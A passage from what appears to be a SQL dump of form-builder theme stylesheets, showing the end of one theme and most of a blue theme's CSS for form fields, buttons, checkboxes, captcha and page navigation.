\" \";\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left;\r\n	height: 19px;\r\n	width: 20px;\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	top: -2px;\r\n	position: relative;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #019993;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #018580;\r\n}\r\n.button-submit:hover {\r\n	background: #00C5BD;\r\n}\r\n.button-reset {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #959595;\r\n	margin-left: 5px;\r\n}\r\n.button-reset:hover {\r\n	background: #E8E8E8;\r\n}\r\n.wdform_page {\r\n	background: #B1EBE9;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #029A95;\r\n	color: #ffffff !important;\r\n	font-size: 16px;\r\n	text-align: left;\r\npadding: 7px 30px 10px;\r\n}\r\n\r\n.wdform_section_break2 p{\r\n	color: #ffffff !important;\r\n	\r\n}\r\n\r\n.wdform_section_break2:after {\r\n	content: \" \" ;\r\n	position: relative;\r\n	width: 16px;\r\n	height: 13px;\r\n	top: -3px;\r\n	left: 1px;\r\n	box-shadow: 0px 7px 2px #c9c9c9;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\n	margin: 16px 10px 16px 0px;\r\ncolor:#4C4C4C;\r\nfont-size: 16px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 5px;\r\n	height: 27px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ABAAAA;\r\nbackground: transparent;\r\ncolor: #5C5C5C;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type=\"password\"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ntextarea {\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border: 1px solid #029A95;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border: 1px solid #029A95;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #029A95;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #029A95;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/06/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\n	box-shadow: 0px 3px 9px 1px rgb(218, 218, 218) inset;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #4C4C4C;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #4C4C4C;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: url([SITE_ROOT]/images/refresh_black.png);\r\n}\r\n.captcha_input {\r\n	height: 20px;\r\n	border-width: 1px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n}\r\n.file_upload {\r\n	border: 0px solid white;\r\n	border-radius: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	color: black;\r\n	background-color: white;\r\n}\r\n.page_deactive {\r\n	font-size: 12px;\r\n color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 20px;\r\n	text-align: center;\r\n	vertical-align: bottom;\r\n	padding: 5px 25px 0px 25px;\r\n	font-weight: bold;\r\n	background-color: #029A95;\r\n	margin-right: 1px;\r\n}\r\n.page_active {\r\n	color: #fff;\r\n	cursor: pointer;\r\n	background-color: #00DAD3;\r\n	display: inline-block;\r\n	vertical-align: bottom;\r\n	height: 20px;\r\n	text-align: center;\r\n	font-size: 16px;\r\n	padding: 5px 25px 0px 25px;\r\n	margin-right: 1px;\r\n}\r\n.page_percentage_active {\r\n	padding: 0px;\r\n	margin: 0px;\r\n	border-spacing: 0px;\r\n	height: 23px;\r\n	line-height: 23px;\r\n	font-size: 15px;\r\n	float: left;\r\n	text-align: right !important;\r\n	z-index: 1;\r\n	position: relative;\r\n	vertical-align: middle;\r\n	background: #01B3AD ;\r\n	background: -moz-linear-gradient(left, #01B3AD 0%, #01CDC6 39%, #02DED6 100%);\r\n	background: -webkit-gradient(linear, left top, right top, color-stop(0%, #01B3AD ), color-stop(39%, #01CDC6 ), color-stop(100%, #02DED6 ));\r\n	background: -webkit-linear-gradient(left, #01B3AD 0%, #01CDC6 39%, #02DED6 100%);\r\n	background: -o-linear-gradient(left, #01B3AD 0%, #01CDC6 39%, #02DED6 100%);\r\n	background: -ms-linear-gradient(left, #01B3AD 0%, #01CDC6 39%, #02DED6 100%);\r\nlinear-gradient(to right, #01B3AD 0%, #01CDC6 39%, #02DED6 100%)\r\n}\r\n.page_percentage_deactive {\r\n	height: 23px;\r\n	line-height: 23px;\r\n	background-color: #029A95;\r\n	text-align: left !important;\r\n	margin-bottom: 1px;\r\n}\r\n.page_numbers {\r\n	font-size: 14px;\r\n	color: #000;\r\n}\r\n.phone_area_code {\r\n	width: 50px;\r\n}\r\n.phone_number {\r\n	width: 100px;\r\n}\r\nbutton {\r\n	cursor: pointer;\r\n}\r\n.other_input {\r\n	border-radius: 0px;\r\n	border-width: 1px;\r\n	height: 16px;\r\n	font-size: 12px;\r\n	padding: 1px;\r\n	margin: 1px;\r\n	margin-left: 25px;\r\n	z-index: 100;\r\n	position: absolute;\r\n}\r\n.wdform_page_navigation {\r\n	text-align: left !important;\r\n	margin-bottom: 0px;\r\n}\r\n.wdform_percentage_text {\r\n	margin: 3px 5px 3px 9px;\r\n	color: #ffffff;\r\n	font-weight: bold;\r\n}\r\n.wdform_percentage_title {\r\n	color: #ffffff;\r\n	font-style: italic;\r\n	margin: 0px 0px 0px 40px;\r\n	display: inline-block;\r\n	line-height: 23px;\r\n	height: 23px;\r\n	vertical-align: middle;\r\n}\r\n.wdform_button button {\r\n	background: #0E4D92;\r\n	cursor: pointer;\r\n	font-size: 17px;\r\n	border-radius: 4px;\r\n	min-width: 80px;\r\n	min-height: 27px;\r\n	color: #fff;\r\n	border: 2px solid #0E3F77;\r\n	margin: 5px;\r\n	box-shadow: 0px 0px 2px #c9c9c9;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_button button:active {\r\n	border: 2px solid #0B2D52;\r\n	background: #0E3F77;\r\n}\r\n\r\n.wdform-section-break-div\r\n{\r\nborder-top:1px solid #ABAAAA !important;\r\n}',0),(21,'Theme 06 blue','.wdform-page-and-images .other_input\r\n{\r\nmax-width: none;\r\n}\r\nbutton,\r\ninput,\r\nselect,\r\ntextarea\r\n{\r\nfont-size:14px;\r\n}\r\n.warning,\r\n.error\r\n{\r\nbackground-color: #BBDBE7;\r\nborder: 1px solid #25A5DF;\r\nmargin-bottom: 10px;\r\ncolor: #25A5DF;\r\npadding: 5px;\r\n}\r\n.warning *,\r\n.error *\r\n{\r\nmargin:0;\r\n}\r\n.recaptcha_input_area input\r\n{\r\nheight:initial !important;\r\n}\r\na.ui-slider-handle {\r\n	width: 16px;\r\n	height: 16px;\r\n	top: -6px;\r\n	border: 0px;\r\n	border-radius: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n}\r\n.ui-slider {\r\n	height: 6px;\r\n	background: transparent !important;\r\n	margin: 7px 0px;\r\nborder:1px solid #ABAAAA !important;\r\n}\r\n.wdform_grading input {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell input[type=\"text\"] {\r\n	width: 100px;\r\n}\r\n.wdform-matrix-cell select {\r\n	width: 60px;\r\n}\r\n.wdform_section .wdform_column:last-child {\r\n	padding-right: 0px !important;\r\n}\r\n.wdform_preload {\r\n	display: none;\r\n}\r\n.wdform_grading {\r\n	padding: 3px 0px;\r\n}\r\n.wdform-matrix-table {\r\n	display: table;\r\n	border-spacing: 0px;\r\n}\r\n.wdform-matrix-column {\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-matrix-cell {\r\n	text-align: center;\r\n	display: table-cell;\r\n	padding: 6px 10px;\r\n}\r\n.wdform-matrix-head>div {\r\n	display: table-cell;\r\n	text-align: center;\r\n}\r\n.wdform-matrix-head {\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row0 {\r\n	background: #DFDFDF;\r\n	display: table-row;\r\n}\r\n.wdform-matrix-row1 {\r\n	background: #CECECE;\r\n	display: table-row;\r\n}\r\n.selected-text {\r\n	text-align: left;\r\n}\r\n.wdform-quantity {\r\n	width: 30px;\r\n	margin: 2px 0px;\r\n}\r\n.wdform_scale_rating label {\r\n	vertical-align: middle;\r\n}\r\n.ui-corner-all {\r\n	border-radius: 3px;\r\n}\r\n.ui-widget-content {\r\n	border: 0px;\r\n	background: transparent;\r\n}\r\na.ui-spinner-button:hover{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:active{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-spinner-button:focus{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:hover{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:active{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\na.ui-slider-handle:focus{\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\nui-state-hover {\r\n	background: #0176AA !important;\r\n	color: #fff;\r\n	outline: none;\r\n}\r\n.ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-content .ui-state-default{\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-widget-header .ui-state-default {\r\n	border: 1px solid #d3d3d3;\r\n	background: #DFDDDD;\r\n	font-weight: normal;\r\n	color: #555555;\r\n}\r\n.ui-slider-range {\r\n	background: #ccc !important;\r\n}\r\n.wdform_map {\r\n	border: 6px solid #DCDCDC;\r\n}\r\n.wdform-page-and-images {\r\n	width: 100%;\r\n	border: 0px !important;\r\n}\r\n.paypal-property {\r\n	display: inline-block;\r\n	margin-right: 15px;\r\n	vertical-align: middle;\r\n}\r\n.sel-wrap {\r\n	display: inline-block;\r\n	vertical-align: middle;\r\n	width:100%;\r\n}\r\n.sel-wrap select {\r\n	position: absolute;\r\n z-index:-1;\r\n width: 0px !important;\r\n}\r\n.sel-imul {\r\n	display: inline-block;\r\n}\r\n.sel-imul .sel-selected {\r\n	cursor: pointer;\r\n	position: relative;\r\n	display: inline-block;\r\n	padding: 2px 0px 2px 4px;\r\n	font-size: 13px;\r\n	height: 23px;\r\n	line-height: 20px;\r\n	overflow: hidden;\r\n	background: transparent;\r\n	background-position: right 2px center;\r\n	width: 100%;\r\n	border: 1px solid #ABAAAA;\r\n	border-radius: 7px;\r\n	color: #4C4C4C;\r\n}\r\n.sel-imul.act .sel-selected {\r\n	background: #fff;\r\n}\r\n.sel-selected .sel-arraw {\r\n	height: 25px;\r\n	width: 28px;\r\n	background: url([SITE_ROOT]/images/06/01.png) no-repeat 0% 50%;\r\n	position: absolute;\r\n	top: -1px;\r\n	right: 0px;\r\n	padding: 2px;\r\n}\r\n.sel-imul:hover .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul.act .sel-selected .sel-arraw {\r\n// background-color:#e0e0e0;\r\n// border-left:1px solid #bbb;\r\n}\r\n.sel-imul .sel-options {\r\n	background: #fff;\r\n	border: 1px solid #dbdbdb;\r\n	border-top: none;\r\n	position: absolute;\r\n	width: inherit;\r\n	display: none;\r\n	z-index: 10;\r\n	max-height: 200px;\r\n	overflow-y: auto;\r\n	overflow-x: hidden;\r\n}\r\n.sel-options .sel-option {\r\n	padding: 3px 4px;\r\n	font-size: 13px;\r\n	border: 1px solid #fff;\r\n	border-right: none;\r\n	border-left: none;\r\n	text-align: left;\r\n}\r\n.sel-options .sel-option:hover {\r\n	border-color: #dbdbdb;\r\n	cursor: pointer;\r\n}\r\n.sel-options .sel-option.sel-ed {\r\n	background: #dbdbdb;\r\n	border-color: #dbdbdb;\r\n}\r\ninput[type=text]{\r\n	margin: 0px;\r\n}\r\ninput[type=password]{\r\n	margin: 0px;\r\n}\r\ninput[type=url]{\r\n	margin: 0px;\r\n}\r\ninput[type=email]{\r\n	margin: 0px;\r\n}\r\ninput.text{\r\n	margin: 0px;\r\n}\r\ninput.title{\r\n	margin: 0px;\r\n}\r\ntextarea{\r\n	margin: 0px;\r\n}\r\nselect {\r\n	margin: 0px;\r\n}\r\n.form-error {\r\n	border-color: red !important;\r\n}\r\n.form-error:focus {\r\n	border-color: red !important;\r\n}\r\n.wdform-field {\r\n	display: table-cell;\r\n	padding: 5px 0px;\r\n}\r\n.wdform-label-section{\r\n	text-align: left;\r\n	display: table-cell;\r\n}\r\n.wdform-element-section {\r\n	text-align: left;\r\n	display: table-cell;\r\n	min-width: 140px;\r\n}\r\n.file-upload input {\r\n	position: absolute;\r\n	visibility: hidden;\r\n}\r\n.file-upload-status {\r\n	margin-left: 10px;\r\n	max-width: 200px;\r\n	font-weight: bold;\r\n	font-size: 16px;\r\n	color: #888;\r\n	background: #fff;\r\n	position: absolute;\r\n	border-radius: 4px;\r\n	height: 24px;\r\n	border: 1px solid #ccc;\r\n	padding-left: 5px;\r\n	padding-right: 5px;\r\n	white-space: nowrap;\r\n	overflow: hidden;\r\n	direction: rtl;\r\n	padding-top: 3px;\r\n	margin-top: 2px;\r\n}\r\n.file-picker {\r\n	width: 66px;\r\n	height: 49px;\r\n	background: url([SITE_ROOT]/images/06/upload.png) no-repeat;\r\n	display: inline-block;\r\n}\r\n.next-page div.wdform-page-button {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\nbackground: url([SITE_ROOT]/images/06/next.png) no-repeat right #0D66B1;\r\n	padding: 0px 36px 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\nborder: 1px solid #107DAF;\r\n}\r\n.next-page div.wdform-page-button:hover {\r\nbackground: url([SITE_ROOT]/images/06/next.png) no-repeat right #25A5DF;\r\n}\r\n.previous-page div.wdform-page-button {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 32px;\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #F0EFEF;\r\n	padding: 0 20px 0 36px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	margin-right: 20px;\r\n	margin-left: 20px;\r\n	border: 1px solid #959595;\r\n}\r\n.previous-page div.wdform-page-button:hover {\r\n	background: url([SITE_ROOT]/images/06/previous.png) no-repeat left #E8E8E8;\r\n}\r\n.button-submit {\r\n	color: #ffffff;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #0D66B1;\r\n	padding: 0px 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #107DAF;\r\n}\r\n.button-submit:hover {\r\n	background: #25A5DF;\r\n}\r\n.button-reset {\r\n	color: #A2A2A2;\r\n	cursor: pointer;\r\n	display: inline-block;\r\n	height: 35px;\r\n	line-height: 35px;\r\n	background: #F0EFEF;\r\n	padding: 0 20px;\r\n	vertical-align: middle;\r\n	font-size: 18px;\r\n	border: 1px solid #959595;\r\n	margin-left: 5px;\r\n}\r\n.button-reset:hover {\r\n	background: #E8E8E8;\r\n}\r\n.wdform_page {\r\n	background: #BBDBE7;\r\n	padding: 15px;\r\n	border-radius: 0px;\r\n	font-family: Segoe UI;\r\n}\r\n.wdform_column {\r\n	float: left;\r\n	border-spacing: 2px;\r\n	border-collapse: separate !important;\r\n}\r\n.wdform_column>div {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_column>.wdform_row:last-child {\r\n	border-bottom: 0px solid #E7E7E7;\r\n}\r\n.wdform_section_break2 {\r\n	margin: 16px 10px 16px 0px;\r\n	display: inline-block;\r\n	background: #0D66B1;\r\n	color: #ffffff;\r\n	font-size: 16px;\r\n	text-align: left;\r\npadding: 7px 30px 10px;\r\n}\r\n\r\n.wdform_section_break2:after {\r\n	content: \" \" ;\r\n	position: relative;\r\n	width: 16px;\r\n	height: 13px;\r\n	top: -3px;\r\n	left: 1px;\r\n	box-shadow: 0px 7px 2px #c9c9c9;\r\n}\r\n\r\n.wdform_section_break\r\n{\r\n	margin: 16px 10px 16px 0px;\r\ncolor:#4C4C4C;\r\n	font-size: 16px;\r\n}\r\n.wdform_section {\r\n	display: table-row;\r\n}\r\nselect {\r\n	border-radius: 5px;\r\n	height: 27px;\r\n	overflow: hidden;\r\n	padding: 2px;\r\nborder: 1px solid #ABAAAA;\r\nbackground: transparent;\r\ncolor: #5C5C5C;\r\n	outline: none;\r\n}\r\ninput[type=\"text\"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type=\"password\"]{\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ntextarea {\r\n	border: 1px solid #ABAAAA;\r\n	height: 25px;\r\n	padding:0 3px !important;\r\n	border-radius: 5px;\r\n	background: transparent;\r\n	color: #5C5C5C;\r\n}\r\ninput[type=\"text\"]:focus{\r\n	border: 1px solid #0176AA ;\r\n	outline: none;\r\n}\r\ninput[type=\"password\"]:focus{\r\n	border: 1px solid #0176AA ;\r\n	outline: none;\r\n}\r\ntextarea:focus{\r\n	border: 1px solid #0176AA ;\r\n	outline: none;\r\n}\r\n\r\n.input_deactive {\r\n	color: #999999;\r\n	font-style: italic;\r\n}\r\n.input_active {\r\n	color: #000000;\r\n	font-style: normal;\r\n}\r\n.am_pm_select {\r\n	width: 30px;\r\n	vertical-align: middle;\r\n}\r\n.checkbox-div input[type=checkbox] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.checkbox-div {\r\n	width: 13px;\r\n	height: 12px;\r\n	background: transparent;\r\n	border: 1px solid #0176AA ;\r\n	border-radius: 0px;\r\n	position: relative;\r\n	display: inline-block;\r\n}\r\n.checkbox-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 1px;\r\n}\r\n.checkbox-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .checkbox-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.checkbox-div input[type=checkbox]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.wdform-calendar-button,\r\n.wdform-calendar-button:hover {\r\n  display:inline-block;\r\n	background: transparent url([SITE_ROOT]/images/06/date.png) no-repeat left 50% !important;\r\n	border: 0px;\r\n	color: transparent;\r\n	width: 20px;\r\n	height: 24px;\r\n	position: relative;\r\n	left: -22px;\r\n	vertical-align: top;\r\n	outline: none;\r\n}\r\n.radio-div input[type=radio] {\r\n	position : absolute;\r\n	z-index: -1;\r\n}\r\n.forlabs {\r\n	float: right;\r\n	margin-right: 20px;\r\n}\r\n.radio-div {\r\n	width: 14px;\r\n	height: 13px;\r\n	background: #fff;\r\n	border: 1px solid #ccc;\r\n	border-radius: 7px;\r\n	position: relative;\r\n	display: inline-block;\r\nbox-shadow: 0px 3px 9px 1px rgb(218, 218, 218) inset;\r\n}\r\n.radio-div label {\r\n	cursor: pointer;\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=0)\";\r\n	filter: alpha(opacity=0);\r\n	opacity: 0;\r\n	content: \" \";\r\n	position: absolute;\r\n	width: 16px;\r\n	height: 13px;\r\n	background: url([SITE_ROOT]/images/03/checkbox.png);\r\n	border-radius: 0px;\r\n	top: -3px;\r\n	left: 2px;\r\n}\r\n.radio-div label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div .wdform-ch-rad-label:hover {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.wdform-ch-rad-label:hover + .radio-div label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=30)\";\r\n	filter: alpha(opacity=30);\r\n	opacity: 0.3;\r\n}\r\n.radio-div input[type=radio]:checked + label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\";\r\n	filter: alpha(opacity=100);\r\n	opacity: 1;\r\n}\r\n.if-ie-div-label {\r\n	-ms-filter: \"progid:DXImageTransform.Microsoft.Alpha(Opacity=100)\" !important;\r\n	filter: alpha(opacity=100) !important;\r\n	opacity: 1 !important;\r\n}\r\n.wdform-ch-rad-label {\r\n	display: inline;\r\n	margin: -4px 5px 5px 5px;\r\n	float: left;\r\n	color: #4C4C4C;\r\n	cursor: pointer\r\n}\r\ntextarea {\r\n	padding-top: 5px;\r\n}\r\n.wdform-date {\r\n  display:inline-block;\r\n	width: 105px\r\n}\r\n.wdform_footer {\r\n	padding-top: 5px;\r\n	margin-top: 15px;\r\n}\r\n.page-numbers {\r\n	vertical-align: middle;\r\n}\r\n.time_box {\r\n	text-align: right;\r\n	width: 30px;\r\n	vertical-align: middle\r\n}\r\n.mini_label {\r\n	font-size: 10px;\r\n	font-family: \"Lucida Grande\", Tahoma, Arial, Verdana, sans-serif;\r\n	color: #000;\r\n}\r\n.wdform-label {\r\n	border: none;\r\n	color: #4C4C4C;\r\n	vertical-align: top;\r\n	line-height: 17px;\r\n}\r\n.wdform_colon {\r\n	color: #000\r\n}\r\n.wdform_separator {\r\n	font-style: bold;\r\n	vertical-align: middle;\r\n	color: #000;\r\n}\r\n.wdform_line {\r\n	color: #000\r\n}\r\n.wdform-required {\r\n	border: none;\r\n	color: red;\r\n	vertical-align: top;\r\n}\r\n.captcha_img {\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	cursor: pointer;\r\n}\r\n.captcha_refresh {\r\n	width: 30px;\r\n	height: 30px;\r\n	border-width: 0px;\r\n	margin: 0px;\r\n	padding: 0px;\r\n	vertical-align: middle;\r\n	cursor: pointer;\r\n	background-image: 